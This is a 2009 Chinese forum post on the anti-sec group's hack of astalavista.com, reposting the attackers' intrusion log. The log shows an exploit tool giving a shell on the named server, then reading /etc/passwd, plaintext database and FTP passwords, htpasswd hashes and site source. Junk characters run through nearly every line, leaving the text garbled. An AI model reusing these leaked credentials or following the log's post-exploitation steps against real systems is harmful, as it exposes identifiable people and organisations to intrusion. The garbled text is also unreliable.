里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 l3 r9 X% U" k/ s! T) l" C
- L% y: H& l' J+ K& |% M[root@front3 ~]# curl -I litespeedtech.com
8 [ | V& ]1 c5 w* @8 KHTTP/1.1 200 OK
9 p; T& Q" D9 o" TDate: Fri, 05 Jun 2009 22:54:51 GMT+ ~0 B4 K) ~0 a! U
Server: LiteSpeed% G9 T# {7 R2 W4 h' u S9 K3 x
2 N. }" k4 P* q
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-$ K+ p: b4 C- p' v0 p( A
- U: X1 T `" [' M' y! l( N' c有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
& Q1 ^2 M! [. q+ Q/ C0 e4 W) \4 j3 U' R4 U3 U: b
, h3 ^( D+ _1 N$ }, ^: `0 Q9 s. f6 m2 X
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ : s+ b+ @0 e2 [1 ^
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
! W/ r; `# N6 W9 E7 u' j* o/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
) ^3 B0 F- ^3 L) }: m\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
+ o2 S9 D& x) ]$ Q) q7 m \/ \/ \/ \/ \/ \/ \/: b/ Q g7 t: u$ L# }# S+ y. J
The Hacking & Security Community; g7 J1 T: o5 s
[+] Founded in 1997 by a hacker computer enthusiast
, A2 K( n9 ]4 [" e0 E- V[-] Exposed in 2009 by anti-sec group
* p1 i- z2 c, ?+ q( J1 L2 Z& m3 E9 |- c7 \' e
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
* G/ c) k o" [6 q>> 03. Who’s behind the site?
: t' n: c5 S5 }" E! d( A>>
8 I* Y2 x J% ^>> A team of security and IT professionals, and a countless number of contributors from all over the world.
& l% n# H: ` {( Z3 G# H9 J' F8 K( ]1 |
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
- g5 \+ c1 G. ^# N>>6 v8 Y0 L- o: e
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and. n2 {, g& {# Z$ ?. d A- ^) S
military institutions.
+ [# i9 J" t- r- e>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.% i2 b* l& V7 ^
- v0 g& B; v; H- _- K- ~8 S
Why has Astalavista been targeted?- D( [2 c0 H7 s5 b+ M% F
+ q- ]! q. Z! H+ j% `* A( }( a4 O6 c
Other than the fact that they are not doing any of this for the “community” but7 z6 y) ~# o: @2 k1 i
for the money, they spread exploits for kids, claim to be a security community
4 H' D& B6 z- K% Z# J(with no real sense of security on their own servers), and they charge you $6.66
: i/ x2 P7 s0 w7 ]; ?! {# u2 \per months to access a dead forum with a directory filled with public releases
- _1 K) Y3 _8 j* eand outdated / broken services., J9 S( Y0 r( `) ^$ r/ o2 z$ U
$ a. K" R% |- [% qWe wanted to see how good that “team of security and IT professionals” really is.
/ D) i- J/ ?6 D. i1 [% O D9 `! l2 b: n+ B; u& Y# [
Let’s begin.# T) ?3 B- X( J, m
: t* @) j- B! O
anti-sec:~# ./g0tshell astalavista.com -p 80
& x+ ]8 V; d2 @' j- q9 m[+] Connecting to astalavista.com:80
0 y: R8 T, E& [* A: e) ~[+] Grabbing banner…. I' \8 b* P2 ?# N# v
LiteSpeed
% t% G1 h# t5 P5 ?+ k[+] Injecting shellcode…
% Z# g+ D, ?( \+ o[-] Wait for it
5 a3 V" U- _5 e
' j! g' {" h; s$ W3 N[~] We g0tshell5 I7 J) Y- S# F+ C3 _& d/ M
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux" \- T) Q4 j" |' W; Y' J
ID: uid=100(apache) gid=500(apache) groups=500(apache)
. `0 d6 l) S; G9 C0 g
5 {/ a% r* {3 r6 x0 _$ a1 ssh-3.2$ cat /etc/passwd
7 g6 J2 a# n+ v' Froot:x:0:0:root:/root:/bin/bash
2 m# d& I$ C, Y+ Xbin:x:1:1:bin:/bin:/sbin/nologin
5 j+ a* c( F: udaemon:x:2:2:daemon:/sbin:/sbin/nologin
* `: C, v6 Z3 Q- j3 {8 g fadm:x:3:4:adm:/var/adm:/sbin/nologin
6 |! [/ `2 q$ b2 Y$ V4 S! Vlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin' `* o, p% d- y9 s# X; R
sync:x:5:0:sync:/sbin:/bin/sync
! S+ i3 V* `" Nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
6 a# _+ B& @1 f0 ahalt:x:7:0:halt:/sbin:/sbin/halt
% M/ V$ S7 p8 u, J& ]/ l7 i: L- l/ `mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
: |* |+ }( y8 }% }* U3 G- C3 Bnews:x:9:13:news:/etc/news:
, K" a% S( Y6 ?! z9 ?9 i" b8 R7 Fuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin/ F. L- o0 v! r6 @. p9 q6 C
operator:x:11:0 perator:/root:/sbin/nologin0 m% v* f" u/ B$ E: @2 M
games:x:12:100:games:/usr/games:/sbin/nologin
: V; A7 x# z3 Kgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
5 a9 V4 l' j2 w4 F- ^8 V+ f/ {ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin2 Q4 L6 h, ~( R$ x m
nobody:x:99:99:Nobody:/:/sbin/nologin
) T: [/ Y2 g) K# ]/ ?& R/ Trpm:x:37:37::/var/lib/rpm:/sbin/nologin2 W) E% J/ z, i- |9 a7 s( [' [
dbus:x:81:81:System message bus:/:/sbin/nologin8 {2 G, [) y* H/ X
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin, K/ w- q3 o& A9 r
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
z+ I/ T; D4 u# o5 [$ J7 Wsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
3 F' l% X2 ^0 a: `' Y+ yvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
3 F0 z/ x% E' [6 g1 Y1 Ihaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
' V+ j% { v/ u+ H0 a1 c& |rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin: _/ X$ m9 K, l6 B5 ? y6 f2 [9 g
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin6 Y: w- q+ s4 I4 ~& k5 @
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
! Y; k6 Y% B3 ]5 G% Dsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin8 Y* P2 G, ~; x, f6 U4 |2 W; A
pcap:x:77:77::/var/arpwatch:/sbin/nologin
E# H. u# V) O/ ^named:x:25:25:Named:/var/named:/sbin/nologin" G/ b' F+ S9 j2 K, H6 |) }
apache:x:100:500::/var/www:/bin/false
: R+ k0 e/ b: r5 m! v7 L4 q% {diradmin:x:101:101::/usr/local/directadmin:/bin/bash
% e) m }$ K/ ~5 U! q" }* Umysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
: m8 M5 F3 t/ q) D* {webapps:x:500:501::/var/www/html:/bin/bash
' a7 o5 W9 z( X5 q+ _0 \* N nmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash0 K# i/ |1 Z4 X
admin:x:501:502::/home/admin:/bin/bash
K! r* r2 h" _4 V1 vjon:x:502:503::/home/jon:/bin/bash
# v5 p* F/ O& A1 D# Rcom:x:503:504::/home/com:/bin/bash9 p5 _2 f2 O/ _5 g
ntp:x:38:38::/etc/ntp:/sbin/nologin: |! e* L- D& y0 U' I
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin: m+ T. @) h0 F+ S' c' z( v+ r5 d
astanet:x:504:505::/home/astanet:/bin/bash9 T2 \9 H5 A4 f7 M' t
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
' Z+ z# `! r9 v% ]% Davahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin$ A( b* s" @. M5 ?) Y( Y3 E
! D7 v/ p& _/ T { ~: W" ~* y
sh-3.2$ cat /etc/hosts5 f0 n: ~ x' C
# Do not remove the following line, or various programs) l# K* F- D$ a8 m9 T5 `! \: ^6 k
# that require network functionality will fail.9 @& u8 P8 x5 G) o5 D- }4 o- ^
127.0.0.1 localhost.localdomain localhost2 h, h0 b& B6 n$ x+ M1 I
::1 localhost6.localdomain6 localhost6; r8 h3 }; F8 q; N8 E
80.74.154.172 asta1.astalavistaserver.com
5 O9 C& a3 Z+ k- Q, S6 j6 b! v
' k0 ?4 t% D2 E3 p/ Msh-3.2$ pwd
5 e6 m' u( o- [5 L/home/com/public_html
) d2 V7 i' M# P+ T2 Q3 N
; v# ^. ]4 e" I. ~6 N) hsh-3.2$ ls -la
9 G% {4 Z, j) G7 ~7 E( t" Gtotal 18460
p: j8 b2 T/ x2 N: O& M; H) tdrwxr-xr-x 30 com apache 4096 May 28 17:06 .! @1 F' c+ F3 A4 F
drwx–x–x 11 com com 4096 Jun 25 2008 ..
9 Y& ]( v: b" P5 t! `% K# [drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
: [5 m' z" `* z& Z6 |: O7 a$ o" bdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache+ q2 ~% r0 N$ u' F
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin" r4 R% Z& w4 M& {
drwxrwxrwx 2 com com 4096 May 19 00:50 config) n- C4 Z9 D v1 x) D
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
7 I# q0 G6 {) @drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules, M3 x" s) c7 n; U, r
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
: K; ?# E5 U) {' mdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo8 c& l0 H. |; O% r7 K
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
8 ]( ~) E2 d2 a$ `. b8 X( B-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
+ c1 `, E; j2 M6 Q. M, Gdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd' l$ B# u3 \- y4 x; I) @" y
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
+ Q" ~/ i4 g& J4 E-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
& Q0 T" _+ D3 s; |2 ydrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed) c' g$ ]! a' A$ z3 ~+ ^ f
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
' {% M: S, A. J N8 {6 ?3 m-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
* L( j# N1 }# X-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
' D! h1 B) a0 \# y- Ndrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
3 P5 ^1 N( a Ddrwxrwxrwx 14 com com 4096 Feb 2 19:29 images7 O6 C4 }) v, y- M
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php$ V: a, @) v" y2 k6 _! ]% @
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer2 l r. H h7 U% J' I, l
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang! J2 ~1 |: Y- c- v& B/ E6 X
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
+ G1 ?0 N5 Q3 Gdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
( D' y' n) w2 s! _ F& t) Ndrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
0 ~9 H' I5 [5 m; l! ? d" I% tdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
+ Q9 c( F% `" }5 g5 |* K8 Ldrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin( ?' @) @3 H9 L. D. O
drwxrwxr-x 22 com com 4096 May 28 17:06 _new8 E' w4 ]& r0 o, }# V7 Q
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old( ~' Q3 q/ A% r; I" W
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy! H% L# p- @# v
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
( O1 J% q1 h, b* Y1 m-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
, M! t4 X9 X# ?; v7 w-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
7 b$ p" T. y( t-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
! P& j* K& q( e8 xdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes* O$ T: E- f; |5 L
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
/ `2 s" H1 {, i" q+ c% Q0 P1 fdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam5 X# K V3 |# v
- J0 w* P+ n* r0 v
sh-3.2$ head -20 index.php+ d5 ?1 ^4 F4 H
<?php6 D$ z& a" ^/ M* M) n
, T" r0 A: q8 n% U" _/**/ @+ Q! r7 N2 b& Y. R3 r
* The main page for the CMS9 A0 k! S9 x5 G0 _# V- S! t, O; F, }
* @copyright CONTREXX CMS - COMVATION AG
4 ?1 M8 U( ~: o, C( t1 {5 J* @author Comvation Development Team% [/ g/ J% x* d, o% f$ h/ u
* @version v1.0.9.10.1 stable
+ T9 t* }. K# x; [* @package contrexx
# f7 @+ `7 ]9 W- o. {% J, G* @subpackage core6 A! E2 i2 @# I/ `& D
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage: [% G2 D5 T s) Y
* @since v0.0.0.09 q- G: v& V# R! D4 e' ~
* @todo Capitalize all class names in project- }% Q2 D2 B- ^% p" v6 `
* @uses /config/configuration.php
' c6 g( @+ ? ]6 ^0 P* @uses /config/settings.php
q! d" V( S, T6 X$ M( {* @uses /config/version.php: E$ i( l& @* |7 x9 `2 v
* @uses /core/API.php* H- g% j; E+ C7 p# k
* @uses /core_modules/cache/index.class.php% q4 ]& u9 J' I7 Z% l" V# [ f
* @uses /core/error.class.php l5 z+ l* {2 r0 u
* @uses /core_modules/banner/index.class.php p6 N* U8 J# a" C
* @uses /core_modules/contact/index.class.php7 u6 j) G$ V; l. U+ t
: b3 f: E3 t: {sh-3.2$ cd config/% n& E- e/ p- @+ A2 _* x
sh-3.2$ ls -la. `. X& T- N0 L: T$ ]1 f1 p( \
total 32- @# x" N! x4 ^# `! d8 S. g
drwxrwxrwx 2 com com 4096 May 19 00:50 .9 r: o* l( g! Q5 `; q9 i
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..0 M! i! @! m$ `- [6 K1 a
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php* W. r1 W$ B/ ]3 j* u
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php. _+ f# u" ~& Q% \8 q
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
$ P9 k; O0 T0 m% b( _* }-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
- f/ P& r9 \" C! q5 ]' K6 v! [3 A& Z
; j! q; b2 v' B r y( Xsh-3.2$ cat configuration.php
& {; k) g3 v! `" t8 b[snip]+ @& ]) g! B, ^
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost- a8 Z1 s+ d* x: e+ E
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
0 K) `2 u9 H3 l$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' J$ ~. A& {$ {. o
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
8 N# B- [2 {9 h0 e) j, p5 J6 ]* Z$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
+ o( b" r- K; \8 h# g$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
1 c% Y5 c4 O# d4 Z( H" U$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
0 }. h2 F" D1 {6 F0 k8 @2 e5 W[snip]$ j+ B h, G8 }) `5 E
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false5 Z; E* D9 N9 g) h# A0 W" L
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
" ~# D' w4 c q3 \$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost2 X& n1 W3 d, `' t! f
$_FTPCONFIG['port'] = 21; // Ftp remote port
' z8 p P7 f9 k$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
0 h4 s$ @; V$ `' G$ R$ h$ W$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password& y) Y6 X! Q: D" ]( P9 ], J
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
) X/ C; @8 x' R ~& ~( V+ d) L D/ n- T# b! _1 l2 v
sh-3.2$ cd ..
" w0 h4 q( `! x2 r9 S) |8 Bsh-3.2$ cd dvd/
0 Y/ N' F, p, B3 a) R* osh-3.2$ ls -la. X k% H) a3 ]# |
total 2913780
/ k. y" y* ~4 w+ _/ T2 vdrwxr-xr-x 2 com com 4096 Sep 9 2008 .. S$ d' |# P+ L" ~8 k
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
9 S4 u, m. g9 m% u9 F! ~-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar1 v; h+ a) f7 j& B3 o. j- Z
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
+ X* u+ O" v2 X% }7 l8 ~9 k-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
9 A2 ~) G7 S: |7 z' J3 q0 i+ N-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess0 {# E5 B: `7 h4 B8 ~4 I( l
6 A) Q) S! V- I2 F8 H U% n
sh-3.2$ cat .htaccess$ S# G" s u! w2 G* }. x8 @
authType Basic
- V' l A! Y7 ^8 k V; t+ DauthName DVD8 g. j; }1 `, w& ]2 S; C
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 r! K1 H- J: c. n5 O
require valid-user& R7 F9 d6 g; @' R
2 A2 ~% m: T5 @( |1 T/ ~" ysh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd/ ^% f2 _9 s& R3 k
DVDdownload:CRD8cuY6.MPT64 X* A) Z! j( w6 R& y+ _* N/ k
DVDdownload2:CR8a36.wluFMg ]! M2 C. Y7 K
8 f& v$ y5 {! @sh-3.2$ cat test.php& g' s! @6 ?% {3 G# D- X3 K6 A
<?php
$ }3 o- Z& U" p! n1 U3 h$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
2 O+ ~+ q( B2 }6 y8 m, n$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));3 @ f5 a; @0 z. d
echo $url;
$ i2 B& U: I: t. Y7 C9 I A?>$ V( Q7 O! H; a4 t [; P$ y6 o
) \4 k- v$ Q6 r$ [
sh-3.2$ cd modifications/0 b6 O2 ]0 Q! t4 u F( {; R
sh-3.2$ ls -la- z. W9 l# e1 e+ b6 m" D/ x
total 32
+ a3 l+ X: S5 o. Cdrwxr-xr-x 8 com com 4096 May 11 12:48 .$ s- E% d* i( }3 q) d8 g
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ y. x1 u, l& k' A+ Jdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng6 b. N7 ~2 Y8 p& A
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
* `! X8 Q& G! \" F1 a, i8 E' @1 Fdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
2 k9 [$ R9 T; q9 _( S" z% b8 wdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc* S& K4 F- a! u) i: o
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
% x- f8 f/ F# d$ w, s" Ndrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp! z3 A( @) x% i$ ^5 P8 _, l
( ]& o! A) O, w0 Y1 R
sh-3.2$ ls -R
/ D" T) l- J, ~: ?4 r$ u! G! o.:$ [ | @4 u5 f9 \0 j" g* \
com_avtng cronjobs onlinetools pjirc search _tmp- ~! _3 s# |6 X5 g3 V( J: A; @- y
% I" I8 i5 P W: [& b
./com_avtng:
: S( r- }3 u- u' P+ Savtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts7 P( J& {- ]* h- g( i
; Y: F2 @0 g e# C./com_avtng/scripts:
5 G1 k& r4 l+ \7 |; w; npopunder.js
9 q2 T# @9 {0 ~8 S7 \, {( l5 } M( I) A! R) ~% x
./cronjobs:6 a" v3 n8 U0 P+ j1 u
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
! [9 B/ L1 E l& F d4 L$ w5 i* H% S( v. t c3 U. r$ v
./cronjobs/tmp:1 `. N m0 G: l' O" b# x5 D" _
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv4 j; _" P& t" d8 ? `
- y: `" c& Q& H9 Z, f+ }./onlinetools:
! p- D% ~( E$ B5 e; cindex.php! F8 p; d1 b* X- B( P
; u$ G2 [* t# H8 \% S& L% _' \./pjirc:
+ K0 c0 U- J; ga_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
5 C! W1 g$ M+ Z9 E! Z- XAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
% Y7 U* Z7 p1 Q9 ^: d. jbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
. L6 U0 i& Q& O4 P' s- z% i/ B" G0 d, C% H
./pjirc/img:
8 f4 Q+ I% h+ g" `% `. Aange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif% d5 J" l* b3 f& f
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
/ P& U! V( m& {# n- ~verre-eau.gif, f6 A: M2 |9 e0 i* v: ]
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
7 ^) p7 r1 L) t: B3 ?( K7 Z1 o+ Rverre-vin.gif7 S: n7 v7 z7 r/ C
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
; J& E: q- u) p* R% J6 Vbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif* L0 f7 H r0 ]# n( t
9 y6 ~( Z) A" T
./pjirc/snd:
; u' y! D; ]& N! _4 @- Tbell2.au ding.au
# G3 o$ I3 g4 Q7 R4 ^
% m8 i: i* A$ z' @./search:! @( }# ^# k* r% R$ k0 v D$ j
searchEngines.php search.php
) ~9 W; X, _/ A0 t* M+ {. v7 T: ]3 D' J+ y; ~3 _+ U* F
./_tmp:' B: f1 {1 i: m. y
defaultPorts.php defaultPorts.txt" u8 i) g8 S) y7 r
+ T( b5 X4 h7 z+ ]' H# v1 w0 X* gsh-3.2$ cd cronjobs/
7 _( M% `* Z! h/ Msh-3.2$ cat exploits.php2 J& f" ^6 I/ a9 X0 i
[snip]
! }) j( G/ o9 A0 @$categories = array();
9 h3 T4 n- m' f! n/ g1 |$ C' j$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;7 |9 D$ e5 s/ Q5 Y/ {1 v" Q2 _; a1 h
$expolits = file($milw0rmFile);) G. H+ a1 A4 _ g9 m$ Z6 y5 f
$comExploits = array();2 [# M0 H: n$ X7 d
[snip]
& _; S6 f' F4 y6 q& p4 d// manage data
1 |% {) { P4 L Wfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26402 T7 X/ E( K3 [0 @1 m& @. y% @& c
: Q2 v& k! c) {' G
// get path and title
% E7 h6 f3 l( |/ k $expolits[$x] = trim($expolits[$x]);9 ?- k. T' k8 _/ b5 ]% |
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));5 i) e, b2 E1 `! N y: l h
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);$ ~0 O8 R" L& P% L6 m7 g
! T$ D1 {: ?% y% c4 ?6 n9 X
// check if file exists; @0 N6 n& t0 M
if (file_exists($path)) {1 }0 ^5 E- [) {6 { C
' u8 n- r! {# O' t% J6 N# b! g
$text = file_get_contents($path);
4 p2 h2 p' n' p& i( L/ C
7 A/ l' ~# r4 L% ?. @+ s // get content and date
/ D' o% |% q1 ~* X; v+ m //$text = htmlspecialchars($text, ENT_QUOTES);
6 h3 ?0 j. a; v7 t$ j' W8 Z $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
( S" z+ r, @& F: s if ($tmptext != ”) {6 X0 \- g& s. r; _" B6 e
$text = $tmptext;# f1 _2 f- y. {
} else {; c4 M- r1 K. a/ f+ [1 p
$text = addslashes(htmlentities($text, ENT_QUOTES));6 I, p# r; h% C1 F
}4 e+ }& I2 p1 ~4 L" A+ R% C% h
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
9 L2 I# U' k# B% S $tmp = explode('-', $date);
3 S2 _* D; E+ V/ [" s $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
. J3 S* j+ F' q, |" D/ n! S' g8 z- C, R) I $cat = getCategory ($path);* D4 H9 F J, e) w# l8 I* A$ t
$ext = pathinfo(basename($path));# i) U) |! \. B2 I+ r
$ext = $ext['extension'];( U1 X3 T: b" W2 F! Y8 s$ B
$qStr = ”! Y1 {1 s- s/ i
SELECT `id`
* b. Z9 P- v0 f3 p: a1 l$ u! i FROM `contrexx_module_exploits`
' |3 z5 W0 g, [2 @( g WHERE `title` = ‘” . $title . “‘. o \# [3 | S4 m1 M
AND `date` = ‘” . $date . “‘
. O: V" i( z: _) B; _ “;: q+ f$ ]3 [/ `; ^0 p& m9 {
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
j1 i8 D' J$ k+ ~ $q = $_objDB->query($qStr);
( F Z; I* J* G9 q- v
: U/ ]: t3 l1 G. G0 s( L; U& C5 h8 l; m if ($q->numRows() == 0) {
& Z7 R8 f( H1 V& t1 V& R4 {
' A. D& e6 b( w6 n // prepare array0 A8 p1 p+ F6 x9 T* x9 s/ n
$comExploits[$x]['date'] = $date;
# j* U! ?( G# \# a" y $comExploits[$x]['title'] = $title;
P ?/ ]4 f. e& I+ o $comExploits[$x]['author'] = ‘milw0rm’;
' Z0 k' |# {# X $comExploits[$x]['text'] = $text;3 ^' M6 t, b) [' n3 j, I0 [* D Q. ~
$comExploits[$x]['source'] = $ext;
3 l7 Y7 m( e0 H, y) R4 ~ $comExploits[$x]['url1'] = ”;
, k7 d4 t5 G+ |& l( t, g8 F: E $comExploits[$x]['url2'] = ”;
! M8 ~# U3 U3 ?0 `" @ $comExploits[$x]['catid'] = $cat;' v9 \! J1 i K9 Q- ?( E: v- ^- A
$comExploits[$x]['lang'] = ‘2′;
. U# [( J' [* h8 A$ x6 Q; X( e8 A $comExploits[$x]['userid'] = ‘12′;
: e5 a$ Z( n; w8 k/ e7 k $comExploits[$x]['startdate'] = ‘0000-00-00′;8 w% D+ s$ z, V2 a
$comExploits[$x]['enddate'] = ‘0000-00-00′;
, W7 ]3 |, y) v+ @9 f p& V" \ $comExploits[$x]['status'] = ‘1′;% O, Z a# s) s0 z' w
$comExploits[$x]['changelog'] = $date;
# |' T6 k% X% i) X6 J# Z$ n9 }, ?+ @2 w W" K0 g
}: n9 Z2 M& Q7 m! X# g4 w
[snip]1 k+ Y+ t1 X" w9 F
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>) @- B+ [' d; j: t9 r
<rss version=”2.0″>
! } U" R0 A* L9 r; @, Q- x <channel>
8 R3 ^* K5 F; P <title>ASTALAVISTA.com - Exploits</title>
7 l9 z, f5 ^1 r4 E <link>http://www.astalavista.com/exploits</link>
4 \5 I, v8 G& v9 P <description>All availably Exploits.</description>
$ ^- U$ M$ I* e <language>en-us</language>+ i( T. a6 O5 M; U2 Q6 G
